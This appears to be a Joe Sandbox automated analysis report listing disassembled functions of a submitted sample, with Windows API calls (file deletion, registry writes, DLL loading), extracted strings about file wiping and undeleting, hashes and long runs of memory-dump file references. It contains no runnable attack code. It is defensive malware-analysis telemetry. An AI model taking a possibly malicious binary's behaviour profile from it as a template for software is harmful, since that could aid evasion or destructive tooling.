Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID: 5$Install Directory$Netscape Browser$Software\Netscape\Netscape Installer$Users\$\Mail\
API String ID: 1607946009-4231422878
Opcode ID: 3473c88f2d061c5400251d61ae1fe3898f5d1badcfe97b1684d5c255c861a5e3
Instruction ID: 01f42e3b5706d860bf38624962c2b2a72ed7aa46088a4e0a63872c243e83595e
Opcode Fuzzy Hash: 3473c88f2d061c5400251d61ae1fe3898f5d1badcfe97b1684d5c255c861a5e3
Instruction Fuzzy Hash: CB719375A0021CDBDB20DBA1CD88FD97378BB48705F1045DAFA89A7291EAF496C4CF19

Function 004570F0 Relevance: 31.6, APIs: 4, Strings: 14, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(WipeExt.dll), ref: 004570FE
GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00457196
GetProcAddress.KERNEL32(00000000,DllUnregisterServer), ref: 004571AA
FreeLibrary.KERNEL32(00000000), ref: 00457213

Part of subcall function 0041532E: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 00415369
Part of subcall function 0041532E: RegCloseKey.ADVAPI32(00000000), ref: 00415372

Part of subcall function 004028D0: SendMessageW.USER32(?,000000F1,?,00000000), ref: 004028E9

Strings

DllUnregisterServer, xrefs: 004571A1
Wipe, xrefs: 00457150
UndeleteMyFiles, xrefs: 0045710F
WipeToShl, xrefs: 004571FB
Not all components are found. Try to reinstall to fix this problem. Error #050, xrefs: 00457114
Wipe, xrefs: 00457200
WipeToShl, xrefs: 0045714B
Wipe, xrefs: 00457128
h#I, xrefs: 00457155
h#I, xrefs: 00457205
h#I, xrefs: 0045712D
DllRegisterServer, xrefs: 0045718D
WipeExt.dll, xrefs: 004570F9
WipeToShl, xrefs: 00457123

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AddressLibraryProc$CloseFreeLoadMessageSendValue
String ID: DllRegisterServer$DllUnregisterServer$Not all components are found. Try to reinstall to fix this problem. Error #050$UndeleteMyFiles$Wipe$Wipe$Wipe$WipeExt.dll$WipeToShl$WipeToShl$WipeToShl$h#I$h#I$h#I
API String ID: 674810275-2294898523
Opcode ID: dfcd1fcef251faf207a6092d21616c3c6f623d8c5999f4e3b8e0cacf92af952f
Instruction ID: b4b7c5ed14cd55f924d4e8d3b8c335936eb64a8eaf7007e303176f060ea9d4b1
Opcode Fuzzy Hash: dfcd1fcef251faf207a6092d21616c3c6f623d8c5999f4e3b8e0cacf92af952f
Instruction Fuzzy Hash: 49318174900304EBDB04ABA0DC4ABEE7774AB84705F20867BE811633C1D7BC5A54CB5E

Function 0044C100 Relevance: 30.2, APIs: 20, Instructions: 222COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0044C119
GetClientRect.USER32(?,?), ref: 0044C12A
InvalidateRect.USER32(?,00000000,00000001), ref: 0044C192
SetWindowLongW.USER32(?,000000EB,00000000), ref: 0044C208
DefWindowProcW.USER32(?,?,?,00000000), ref: 0044C399

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$LongRect$ClientInvalidateProc
String ID:
API String ID: 2437945965-0
Opcode ID: bbee27dd04243f52a2526a2fe321294e201f3e2f7c54a8db56c17226a9c67303
Instruction ID: 99bb5b14242e99f5d630ad1d8ad53b816abf9713250acfaf5bbeb5460cc52982
Opcode Fuzzy Hash: bbee27dd04243f52a2526a2fe321294e201f3e2f7c54a8db56c17226a9c67303
Instruction Fuzzy Hash: E9A1D6B5A00219EFCB04DFA9D984EAEBBB5FF4C300F208559E909A7351DA30A941CF65

Function 00454E40 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 129threadCOMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000400), ref: 00454EBA
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00454EE5

Part of subcall function 0044E210: _wcslen.LIBCMT ref: 0044E224
Part of subcall function 0044E210: SetLastError.KERNEL32(00000100), ref: 0044E236

Part of subcall function 0044E1D0: DeviceIoControl.KERNEL32(?,0007405C,00000000,00000000,?,00000008,?,00000000), ref: 0044E1ED

__wcsnicmp.LIBCMT ref: 00454F90
CloseHandle.KERNEL32(000000FF), ref: 00454FA3
ExitThread.KERNEL32 ref: 00454FAE
CloseHandle.KERNEL32(000000FF), ref: 00454FF9
ExitThread.KERNEL32 ref: 00455004
GetLastError.KERNEL32 ref: 00455040
CloseHandle.KERNEL32(000000FF), ref: 00455053
ExitThread.KERNEL32 ref: 0045506C
ExitThread.KERNEL32 ref: 00455077

Strings

?:\, xrefs: 00454E69
FAT, xrefs: 00454F84

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ExitThread$CloseHandle$ErrorLast$ControlDeviceDiskFreeInformationSpaceVolume__wcsnicmp_wcslen
String ID: ?:\$FAT
API String ID: 867948315-1164324470
Opcode ID: fe7a30197d253b00d9be44768ef528f6735750f04b8d5ec2e0298f667b69da23
Instruction ID: 24a1d26600d644bdd6dd6f0786b8ae80303604b6cbf64afb2d674d3a230d3ee2
Opcode Fuzzy Hash: fe7a30197d253b00d9be44768ef528f6735750f04b8d5ec2e0298f667b69da23
Instruction Fuzzy Hash: 3D5115749002288BDB64DB64CC44B99B7F5FF88705F00C5E9E988A6280DF75AAC5CFD9

Function 0043E4B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82stringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0043E526
lstrcpyW.KERNEL32(?,00476658), ref: 0043E545
FindFirstFileW.KERNEL32(?,00000825), ref: 0043E563
FindNextFileW.KERNEL32(000000FF,00000825), ref: 0043E586
lstrcpyW.KERNEL32(?,?), ref: 0043E5A5
lstrcmpW.KERNEL32(?,00476660), ref: 0043E5B7
SetFileAttributesW.KERNEL32(?,00000080), ref: 0043E5CD
DeleteFileW.KERNEL32(?), ref: 0043E5DA
FindClose.KERNEL32(000000FF), ref: 0043E5E9

Strings

MyUnDelete_temp_folder, xrefs: 0043E506

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: File$Find$lstrcpy$AttributesCloseDeleteFirstNextlstrcmplstrlen
String ID: MyUnDelete_temp_folder
API String ID: 3691997126-2231231991
Opcode ID: c08d467c526a1f0b7bbff5339905df31cdb3ae0ea0b5147c8d36de39df99934a
Instruction ID: 06ead9f85fb3711ea9cfca83548400d49935ba667014af5511cfcb6d4872e851
Opcode Fuzzy Hash: c08d467c526a1f0b7bbff5339905df31cdb3ae0ea0b5147c8d36de39df99934a
Instruction Fuzzy Hash: 3531A47190421C9BCB14DBA1DC8DEDE73B8BB48700F5045DDF949A3280EBB99684CF59

Function 0041C243 Relevance: 15.1, APIs: 10, Instructions: 126memoryfilestringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0041C24D
GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,0041C416,00000000,?,00000000,?,0041B453,?,?), ref: 0041C28B

Part of subcall function 00408BEE: __CxxThrowException@8.LIBCMT ref: 00408C04
Part of subcall function 00408BEE: __EH_prolog3.LIBCMT ref: 00408C11

_DebugHeapAllocator.LIBCPMTD ref: 0041C2D2
PathIsUNCW.SHLWAPI(?,00000000,?,?,0041B453,?,?), ref: 0041C2FB
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,0041B453,?,?), ref: 0041C322
CharUpperW.USER32(00000000), ref: 0041C355
FindFirstFileW.KERNEL32(?,?), ref: 0041C371
FindClose.KERNEL32(00000000), ref: 0041C37D
lstrlenW.KERNEL32(?), ref: 0041C39B
_DebugHeapAllocator.LIBCPMTD ref: 0041C3FA

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
